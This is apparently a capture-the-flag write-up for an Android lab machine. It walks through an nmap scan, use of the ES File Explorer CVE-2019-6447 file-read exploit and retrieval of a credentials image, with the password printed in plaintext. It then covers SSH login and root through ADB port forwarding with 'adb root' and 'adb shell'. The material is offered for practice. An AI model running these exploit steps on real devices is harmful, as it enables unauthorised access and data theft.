As always we start with nmap to discover open ports.
Nmap Scan
nmap -sC -sV -oA explore 10.10.10.247
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
35971/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=7/2%Time=60DF1B3D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phone
Enumeration
First, let's look for exploits for these services (ES File Explorer and Bukkit JSONAPI). The only hit is an arbitrary file read exploit for ES File Explorer 4.1.9.7.4 (CVE-2019-6447, the unauthenticated HTTP service the app opens on port 59777; nmap's "Bukkit JSONAPI" label for that port is a misidentification), so let's just try it.
Reading the exploit code, it sends a POST request to http://10.10.10.247:59777/ with a Content-Type: application/json header and a JSON body of {"command": cmd}.
Let's first try the exploit manually before running the Python script. Visit http://10.10.10.247:59777/, intercept the request with Burp or ZAP, send it to Repeater, and edit the request the way the exploit does: change the method to POST, add the JSON content type and send a body of {"command": "getDeviceInfo"}. We get a response with the device info.
Now that we understand how the exploit works, let's run the script, since it parses the JSON response and makes our life easier.
During enumeration I found that the installed ES File Explorer version is 4.1.9.7.3. The exploit is written against 4.1.9.7.4, but the bug affects that version and everything older, which is why it works here; in general an exploit published for a specific version is worth trying against older versions too.
Initial Foothold
Trying each command in turn, listPics listed an interesting picture (creds.jpg).
I downloaded it with python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
and opened it. It has credentials in it:
kristi:Kr1sT!5h@Rp3xPl0r3!
Now ssh to the box with these credentials, remembering that SSH listens on port 2222 rather than 22, and we are in.
Getting root
Looking again at the ports found earlier, 5555 is the default port for Android Debug Bridge (ADB) over TCP. nmap reported it as filtered, so it is not reachable from outside, but HackTricks documents how to use this service to get a root shell:
https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting/adb-commands
POC:
- First, we have to forward the port over SSH, because the ADB service is only reachable from the box itself (nmap showed 5555 as filtered from the outside).
ssh -p 2222 -L 1337:localhost:5555 kristi@10.10.10.247
- This maps 127.0.0.1:1337 on our machine to 10.10.10.247:5555.
- Connect to the forwarded ADB service with the adb tool (here <IP>:<PORT> is 127.0.0.1:1337).
adb connect <IP>:<PORT>
- Check that the phone shows up as connected to your PC.
adb devices
- Now we can do anything on the device through adb. To get root, type
adb root
- which restarts the adbd daemon with root permissions. This only works on builds that allow it (ro.debuggable=1, i.e. userdebug/eng or emulator-style images); on a production build adb answers "adbd cannot run as root in production builds" and this route is closed.
- Because adbd restarted, the connection drops, so connect to the ADB service again.
adb connect <IP>:<PORT>
- Finally, open a shell, which is now root.
adb shell